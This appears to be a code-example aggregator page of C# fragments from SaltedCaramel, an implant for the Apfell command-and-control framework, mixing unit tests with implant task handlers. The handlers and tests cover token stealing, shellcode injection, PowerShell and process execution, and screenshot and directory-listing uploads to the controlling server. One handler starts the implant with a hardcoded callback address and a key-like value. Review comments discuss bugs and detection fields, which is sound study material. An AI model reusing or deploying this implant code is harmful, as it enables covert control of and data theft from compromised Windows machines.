Esempio n. 1
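        /// <summary>
        /// Dispatches a <c>steal_token</c> task with an empty parameter string through
        /// <c>DispatchTask</c> and expects the task to end with status <c>complete</c>.
        /// </summary>
        /// <remarks>
        /// Going by the test name, an empty parameter presumably selects winlogon as the
        /// source process - confirm against the task handler. The result likely depends on
        /// the privileges of the process running the test.
        /// </remarks>
        public void TokenWinlogon()
        {
            SCTask task = new SCTask("steal_token", "", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
        }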
Esempio n. 2
        /// <summary>
        /// Calls the <c>cd</c> handler directly with <c>C:\Temp</c> and expects status
        /// <c>complete</c>.
        /// </summary>
        /// <remarks>Presumably requires <c>C:\Temp</c> to exist on the test host.</remarks>
        public void TaskChangeDirValid()
        {
            // Arrange
            var cdTask = new SCTask("cd", "C:\\Temp", "1");

            // Act
            Tasks.ChangeDir.Execute(cdTask);

            // Assert
            Assert.AreEqual("complete", cdTask.status);
        }
Esempio n. 3
        /// <summary>
        /// Calls the <c>cd</c> handler directly with <c>C:\asdf</c> and expects status
        /// <c>error</c>.
        /// </summary>
        /// <remarks>Presumably relies on <c>C:\asdf</c> not existing on the test host.</remarks>
        public void TaskChangeDirInvalid()
        {
            // Arrange
            var cdTask = new SCTask("cd", "C:\\asdf", "1");

            // Act
            Tasks.ChangeDir.Execute(cdTask);

            // Assert
            Assert.AreEqual("error", cdTask.status);
        }
Esempio n. 4
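        /// <summary>
        /// Dispatches a <c>cd</c> task for <c>C:\Temp</c> through <c>DispatchTask</c> and
        /// expects status <c>complete</c>.
        /// </summary>
        /// <remarks>Presumably requires <c>C:\Temp</c> to exist on the test host.</remarks>
        public void TaskChangeDirValid()
        {
            SCTask task = new SCTask("cd", "C:\\Temp", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
        }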
Esempio n. 5
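        /// <summary>
        /// Dispatches a <c>shinject</c> task with an empty parameter string through
        /// <c>DispatchTask</c> and expects status <c>complete</c>.
        /// </summary>
        public void Shellcode()
        {
            SCTask task = new SCTask("shinject", "", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
        }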
Esempio n. 6
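        /// <summary>
        /// Dispatches a <c>cd</c> task for <c>C:\asdf</c> through <c>DispatchTask</c> and
        /// expects status <c>error</c>.
        /// </summary>
        /// <remarks>Presumably relies on <c>C:\asdf</c> not existing on the test host.</remarks>
        public void TaskChangeDirInvalid()
        {
            SCTask task = new SCTask("cd", "C:\\asdf", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("error", task.status);
        }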
Esempio n. 7
        /// <summary>
        /// Posts a screen capture to the server as a single-chunk file transfer: one response
        /// announcing one chunk, one response carrying the base64-encoded bytes, then a
        /// completion call. Same workflow as sending a file to the Apfell server.
        /// </summary>
        /// <param name="implant">Object used for <c>PostResponse</c> and <c>SendComplete</c>.</param>
        /// <param name="task">Task whose <c>id</c> tags every response; on failure its
        /// <c>status</c> and <c>message</c> are overwritten.</param>
        /// <param name="screenshot">Raw bytes that are base64-encoded into the chunk.</param>
        /// <remarks>
        /// Visible wire fields, useful when writing detections for this traffic:
        /// <c>total_chunks</c>, <c>task</c>, and the serialized <c>FileChunk</c> members
        /// <c>chunk_num</c>, <c>file_id</c>, <c>chunk_data</c>.
        /// </remarks>
        private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot)
        {
            try // Try block for HTTP request
            {
                // Send total number of chunks to Apfell server
                // Number of chunks will always be one for screen capture task
                // Receive file ID in response
                // NOTE(review): the JSON is built by string concatenation, so task.id is
                // inserted without escaping.
                SCTaskResp    initial = new SCTaskResp(task.id, "{\"total_chunks\": " + 1 + ", \"task\":\"" + task.id + "\"}");
                // NOTE(review): if the reply does not deserialize to an object, reply is
                // presumably null and the next line throws into the catch below - confirm.
                DownloadReply reply   = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
                Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id);

                // Convert chunk to base64 blob and create our FileChunk
                FileChunk fc = new FileChunk();
                fc.chunk_num  = 1;
                fc.file_id    = reply.file_id;
                fc.chunk_data = Convert.ToBase64String(screenshot);

                // Send our FileChunk to Apfell server
                // Receive status in response
                SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
                Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}");
                string postReply = implant.PostResponse(response);
                // NOTE(review): PostResponse(response) is called a second time inside the
                // interpolated string, so the same chunk is posted twice per capture;
                // postReply above is never read.
                Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}");

                // Tell the Apfell server file transfer is done
                implant.SendComplete(task.id);
            }
            catch (Exception e) // Catch exceptions from HTTP requests
            {
                // Something failed: record it on the task. Nothing in this block sends the
                // error to the server; only the local task fields are updated here.
                task.status  = "error";
                task.message = e.Message;
            }
        }
Esempio n. 8
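 /// <summary>
 /// Handles the <c>jobs</c> and <c>jobkill</c> commands.
 /// <c>jobs</c> stores the JSON serialization of <c>implant.jobs</c> in
 /// <c>task.message</c>; <c>jobkill</c> aborts the thread of every job whose
 /// <c>shortId</c> equals the integer given in <c>task.@params</c>.
 /// </summary>
 /// <param name="task">Task to execute; its <c>status</c> and <c>message</c> are set.</param>
 /// <param name="implant">Supplies the <c>jobs</c> collection.</param>
 /// <remarks>
 /// Any other command leaves the task untouched, as does a <c>jobkill</c> whose id
 /// matches no job.
 /// </remarks>
 public static void Execute(SCTask task, SCImplant implant)
 {
     if (task.command == "jobs")
     {
         task.status  = "complete";
         task.message = JsonConvert.SerializeObject(implant.jobs);
     }
     else if (task.command == "jobkill")
     {
         // Parse the id once, before the loop. Previously the conversion ran on every
         // iteration outside any try block, so a non-numeric or out-of-range parameter
         // escaped as an unhandled exception instead of an error status.
         int targetId;
         try
         {
             targetId = Convert.ToInt32(task.@params);
         }
         catch (Exception e) when (e is FormatException || e is OverflowException)
         {
             task.status  = "error";
             task.message = $"Invalid job id '{task.@params}': {e.Message}";
             return;
         }

         foreach (Job j in implant.jobs)
         {
             if (j.shortId != targetId)
             {
                 continue;
             }

             Thread t = j.thread;
             try
             {
                 t.Abort();
                 task.status  = "complete";
                 task.message = $"Killed job {j.shortId}";
             }
             catch (Exception e)
             {
                 task.status  = "error";
                 task.message = $"Error stopping job {j.shortId}: {e.Message}";
             }
         }
     }
 }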
Esempio n. 9
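        /// <summary>
        /// Dispatches a <c>steal_token</c> task with parameter <c>12351</c> through
        /// <c>DispatchTask</c> and expects status <c>error</c>.
        /// </summary>
        /// <remarks>
        /// The parameter is presumably a process id that is expected not to exist on the
        /// test host - confirm against the task handler.
        /// </remarks>
        public void TokenInvalid()
        {
            SCTask task = new SCTask("steal_token", "12351", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("error", task.status);
        }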
Esempio n. 10
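        /// <summary>
        /// Lists a directory and reports each entry's size, type and name to the server.
        /// </summary>
        /// <param name="task">Task whose <c>@params</c> holds the path (an empty string
        /// selects the parameterless listing); its <c>status</c> and <c>message</c> are set.</param>
        /// <param name="implant">Used to post the listing, the completion and any error.</param>
        /// <remarks>
        /// On success <c>task.message</c> holds the same JSON that was posted. On failure the
        /// error is sent with <c>SendError</c> and recorded on the task.
        /// </remarks>
        public static void Execute(SCTask task, SCImplant implant)
        {
            string path = task.@params;

            try
            {
                SharpSploitResultList<Host.FileSystemEntryResult> list = path != ""
                    ? Host.GetDirectoryListing(path)
                    : Host.GetDirectoryListing();

                List<Dictionary<string, string>> fileList = new List<Dictionary<string, string>>();

                foreach (Host.FileSystemEntryResult item in list)
                {
                    // NOTE(review): if item.Name is not a full path, FileInfo resolves it
                    // against the current directory rather than `path` - confirm.
                    FileInfo f = new FileInfo(item.Name);

                    string size;
                    string type;
                    string name;
                    try
                    {
                        // Length throws for anything that is not a readable file.
                        size = f.Length.ToString();
                        type = "file";
                        name = f.Name;
                    }
                    catch
                    {
                        // Best effort, as in the original: any failure is reported as a
                        // directory entry of size 0.
                        size = "0";
                        type = "dir";
                        name = item.Name;
                    }

                    fileList.Add(new Dictionary<string, string>
                    {
                        { "size", size },
                        { "type", type },
                        { "name", name },
                    });
                }

                string json = JsonConvert.SerializeObject(fileList);
                SCTaskResp response = new SCTaskResp(task.id, json);
                implant.PostResponse(response);
                implant.SendComplete(task.id);
                task.status  = "complete";
                // List<T>.ToString() returns only the type name; store the listing itself.
                task.message = json;
            }
            catch (DirectoryNotFoundException)
            {
                Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}");
                implant.SendError(task.id, "Error: Directory not found.");
                task.status  = "error";
                task.message = "Directory not found.";
            }
            catch (Exception e)
            {
                Debug.WriteLine($"DirectoryList - ERROR: {e.Message}");
                implant.SendError(task.id, $"Error: {e.Message}");
                task.status  = "error";
                task.message = e.Message;
            }
        }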
Esempio n. 11
        /// <summary>
        /// Calls the <c>powershell</c> handler directly with <c>Get-Process</c> and expects
        /// status <c>complete</c> and a non-null message.
        /// </summary>
        public void PowerShellValid()
        {
            // Arrange
            var psTask = new SCTask("powershell", "Get-Process", "1");

            // Act
            Tasks.Powershell.Execute(psTask);

            // Assert
            Assert.AreEqual("complete", psTask.status);
            Assert.IsNotNull(psTask.message);
        }
Esempio n. 12
        /// <summary>
        /// Calls the <c>kill</c> handler directly with parameter <c>1234567</c> and expects
        /// status <c>error</c> and a non-null message.
        /// </summary>
        /// <remarks>
        /// The parameter is presumably a process id expected not to exist on the test host.
        /// </remarks>
        public void KillInvalid()
        {
            // Arrange
            var killTask = new SCTask("kill", "1234567", "1");

            // Act
            Tasks.Kill.Execute(killTask);

            // Assert
            Assert.AreEqual("error", killTask.status);
            Assert.IsNotNull(killTask.message);
        }
Esempio n. 13
        /// <summary>
        /// Calls the <c>ls</c> handler directly for <c>C:\asdf</c> and expects status
        /// <c>error</c> and a non-null message.
        /// </summary>
        /// <remarks>Presumably relies on <c>C:\asdf</c> not existing on the test host.</remarks>
        public void DirectoryListInvalid()
        {
            // Arrange
            var lsTask = new SCTask("ls", "C:\\asdf", "1");

            // Act
            Tasks.DirectoryList.Execute(lsTask, implant);

            // Assert
            Assert.AreEqual("error", lsTask.status);
            Assert.IsNotNull(lsTask.message);
        }
Esempio n. 14
        /// <summary>
        /// Calls the <c>ls</c> handler directly for <c>C:\Temp</c> and expects status
        /// <c>complete</c> and a non-null message.
        /// </summary>
        /// <remarks>Presumably requires <c>C:\Temp</c> to exist on the test host.</remarks>
        public void DirectoryListValid()
        {
            // Arrange
            var lsTask = new SCTask("ls", "C:\\Temp", "1");

            // Act
            Tasks.DirectoryList.Execute(lsTask, implant);

            // Assert
            Assert.AreEqual("complete", lsTask.status);
            Assert.IsNotNull(lsTask.message);
        }
Esempio n. 15
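        /// <summary>
        /// Calls the token handler directly with a <c>steal_token</c> task for parameter
        /// <c>12351</c> and expects status <c>error</c>.
        /// </summary>
        /// <remarks>
        /// <c>Tasks.Token.Revert()</c> runs in a <c>finally</c> block so the cleanup is not
        /// skipped when the handler throws or the assertion fails. It presumably undoes any
        /// token state the handler set - confirm against the handler.
        /// </remarks>
        public void TokenInvalid()
        {
            SCTask task = new SCTask("steal_token", "12351", "1");

            try
            {
                Tasks.Token.Execute(task);
                Assert.AreEqual("error", task.status);
            }
            finally
            {
                // A failed assertion throws; without finally the revert was skipped and the
                // state carried over into later tests.
                Tasks.Token.Revert();
            }
        }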
Esempio n. 16
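        /// <summary>
        /// Calls the token handler directly with a <c>steal_token</c> task and an empty
        /// parameter string, and expects status <c>complete</c>.
        /// </summary>
        /// <remarks>
        /// <c>Tasks.Token.Revert()</c> runs in a <c>finally</c> block so the cleanup is not
        /// skipped when the handler throws or the assertion fails. Going by the test name,
        /// the empty parameter presumably selects winlogon - confirm against the handler.
        /// </remarks>
        public void TokenWinlogon()
        {
            SCTask task = new SCTask("steal_token", "", "1");

            try
            {
                Tasks.Token.Execute(task);
                Assert.AreEqual("complete", task.status);
            }
            finally
            {
                // A failed assertion throws; without finally the revert was skipped and the
                // state carried over into later tests.
                Tasks.Token.Revert();
            }
        }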
Esempio n. 17
 /// <summary>
 /// Calls <c>LoadShellcode()</c> and, when it returns true, marks the task as
 /// <c>complete</c> with the message "Shellcode loaded.".
 /// </summary>
 /// <param name="task">Task whose <c>status</c> and <c>message</c> are set on success.</param>
 /// <remarks>
 /// When <c>LoadShellcode()</c> returns false the task is left unchanged: no error
 /// status or message is recorded in this method.
 /// </remarks>
 public static void Execute(SCTask task)
 {
     if (LoadShellcode())
     {
         task.status  = "complete";
         task.message = "Shellcode loaded.";
     }
 }
Esempio n. 18
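        /// <summary>
        /// Dispatches a <c>run</c> task for the command <c>asdf</c> through
        /// <c>DispatchTask</c> and expects status <c>error</c> and a non-null message.
        /// </summary>
        public void ProcInvalid()
        {
            SCTask task = new SCTask("run", "asdf", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("error", task.status);
            Assert.IsNotNull(task.message);
        }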
Esempio n. 19
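        /// <summary>
        /// Dispatches a <c>powershell</c> task running <c>Get-Process</c> through
        /// <c>DispatchTask</c> and expects status <c>complete</c> and a non-null message.
        /// </summary>
        public void PowerShellValid()
        {
            SCTask task = new SCTask("powershell", "Get-Process", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
            Assert.IsNotNull(task.message);
        }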
Esempio n. 20
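        /// <summary>
        /// Dispatches a <c>run</c> task for <c>whoami</c> through <c>DispatchTask</c> and
        /// expects status <c>complete</c> and a non-null message.
        /// </summary>
        public void ProcValid()
        {
            SCTask task = new SCTask("run", "whoami", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
            Assert.IsNotNull(task.message);
        }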
Esempio n. 21
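        /// <summary>
        /// Dispatches a <c>kill</c> task with parameter <c>1234567</c> through
        /// <c>DispatchTask</c> and expects status <c>error</c> and a non-null message.
        /// </summary>
        /// <remarks>
        /// The parameter is presumably a process id expected not to exist on the test host.
        /// </remarks>
        public void KillInvalid()
        {
            SCTask task = new SCTask("kill", "1234567", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("error", task.status);
            Assert.IsNotNull(task.message);
        }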
Esempio n. 22
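        /// <summary>
        /// Dispatches an <c>ls</c> task for <c>C:\asdf</c> through <c>DispatchTask</c> and
        /// expects status <c>error</c> and a non-null message.
        /// </summary>
        /// <remarks>Presumably relies on <c>C:\asdf</c> not existing on the test host.</remarks>
        public void DirectoryListInvalid()
        {
            SCTask task = new SCTask("ls", "C:\\asdf", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("error", task.status);
            Assert.IsNotNull(task.message);
        }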
Esempio n. 23
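        /// <summary>
        /// Dispatches an <c>ls</c> task for <c>C:\Temp</c> through <c>DispatchTask</c> and
        /// expects status <c>complete</c> and a non-null message.
        /// </summary>
        /// <remarks>Presumably requires <c>C:\Temp</c> to exist on the test host.</remarks>
        public void DirectoryListValid()
        {
            SCTask task = new SCTask("ls", "C:\\Temp", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
            Assert.IsNotNull(task.message);
        }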
Esempio n. 24
        /// <summary>
        /// Calls the <c>ps</c> handler directly and expects status <c>complete</c> and a
        /// message that contains the text <c>explorer</c>.
        /// </summary>
        /// <remarks>
        /// The last assertion depends on the host: it only holds where a process whose
        /// listing contains "explorer" is running.
        /// </remarks>
        public void ProcessList()
        {
            // Arrange
            var psTask = new SCTask("ps", "", "1");

            // Act
            Tasks.ProcessList.Execute(psTask);

            // Assert
            Assert.AreEqual("complete", psTask.status);
            Assert.IsNotNull(psTask.message);
            Assert.IsTrue(psTask.message.Contains("explorer"));
        }
Esempio n. 25
        /// <summary>
        /// Clears <c>Tasks.Token.stolenHandle</c>, then calls the <c>run</c> handler directly
        /// with <c>whoami /priv</c> and expects status <c>complete</c> and a non-null message.
        /// </summary>
        public void ProcValid()
        {
            // Arrange: reset the shared static handle so earlier tests do not affect this one.
            Tasks.Token.stolenHandle = IntPtr.Zero;
            var runTask = new SCTask("run", "whoami /priv", "1");

            // Act
            Tasks.Proc.Execute(runTask, implant);

            // Assert
            Assert.AreEqual("complete", runTask.status);
            Assert.IsNotNull(runTask.message);
        }
Esempio n. 26
        /// <summary>
        /// Clears <c>Tasks.Token.stolenHandle</c>, then calls the <c>run</c> handler directly
        /// with the command <c>asdf</c> and expects status <c>error</c> and a non-null message.
        /// </summary>
        public void ProcInvalid()
        {
            // Arrange: reset the shared static handle so earlier tests do not affect this one.
            Tasks.Token.stolenHandle = IntPtr.Zero;
            var runTask = new SCTask("run", "asdf", "1");

            // Act
            Tasks.Proc.Execute(runTask, implant);

            // Assert
            Assert.AreEqual("error", runTask.status);
            Assert.IsNotNull(runTask.message);
        }
Esempio n. 27
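        /// <summary>
        /// Dispatches a <c>ps</c> task through <c>DispatchTask</c> and expects status
        /// <c>complete</c> and a message that contains the text <c>explorer</c>.
        /// </summary>
        /// <remarks>
        /// The last assertion depends on the host: it only holds where a process whose
        /// listing contains "explorer" is running.
        /// </remarks>
        public void ProcessList()
        {
            SCTask task = new SCTask("ps", "", "1");

            task.DispatchTask(implant);

            // Expected value goes first so a failure message labels the two values correctly.
            Assert.AreEqual("complete", task.status);
            Assert.IsNotNull(task.message);
            Assert.IsTrue(task.message.Contains("explorer"));
        }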
Esempio n. 28
        /// <summary>
        /// Creates an application domain named "asdfasdf", loads the assembly that defines
        /// <c>SaltedCaramel</c> through it, and invokes that assembly's entry point with
        /// three fixed string arguments.
        /// </summary>
        /// <param name="task">Not read anywhere in this method.</param>
        /// <remarks>
        /// NOTE(review): the three arguments are string literals compiled into the binary.
        /// They look like a server URL, a base64-encoded value and a GUID - presumably the
        /// callback address, a key and an identifier; confirm against the entry point.
        /// Key-like material committed to source should be treated as exposed, and fixed
        /// literals like these are recoverable from the assembly by static analysis.
        /// </remarks>
        public static void Execute(SCTask task)
        {
            // Earlier variant, kept for reference: invoke the entry point directly without
            // creating a separate application domain.
            //typeof(SaltedCaramel).Assembly.EntryPoint.Invoke(null,
            //    new[] { new string[] { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" } });
            AppDomain domain = AppDomain.CreateDomain("asdfasdf");
            Assembly  target = domain.Load(typeof(SaltedCaramel).Assembly.FullName);

            // Same literals as in the commented-out call above.
            string[] args = { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" };
            // EntryPoint takes a single string[] parameter, hence the wrapping array.
            target.EntryPoint.Invoke(null, new[] { args });
        }
Esempio n. 29
        // (username, (password, netonly))

        /// <summary>
        /// Routes a token task to its handler by command name: <c>steal_token</c> goes to
        /// <c>StealToken</c> and <c>make_token</c> goes to <c>MakeToken</c>.
        /// </summary>
        /// <param name="task">Task to route; passed unchanged to the selected handler.</param>
        /// <remarks>Any other command is ignored and the task is left untouched.</remarks>
        public static void Execute(SCTask task)
        {
            switch (task.command)
            {
                case "steal_token":
                    StealToken(task);
                    break;

                case "make_token":
                    MakeToken(task);
                    break;
            }
        }
Esempio n. 30
 /// <summary>
 /// Reports the task as complete to the server, then terminates the process with
 /// exit code 0.
 /// </summary>
 /// <param name="task">Task whose <c>id</c> is reported.</param>
 /// <param name="implant">Used for <c>SendComplete</c> and, on failure, <c>SendError</c>.</param>
 /// <remarks>
 /// If <c>SendComplete</c> throws, the exception message is sent with <c>SendError</c>
 /// instead. An exception thrown by <c>SendError</c> itself is not caught here, so in
 /// that case <c>Environment.Exit</c> is not reached.
 /// </remarks>
 public static void Execute(SCTask task, SCImplant implant)
 {
     try
     {
         implant.SendComplete(task.id);
     }
     catch (Exception ex)
     {
         // Reporting completion failed; report the failure reason instead.
         implant.SendError(task.id, ex.Message);
     }

     // Ends the whole process, not just the current task.
     Environment.Exit(0);
 }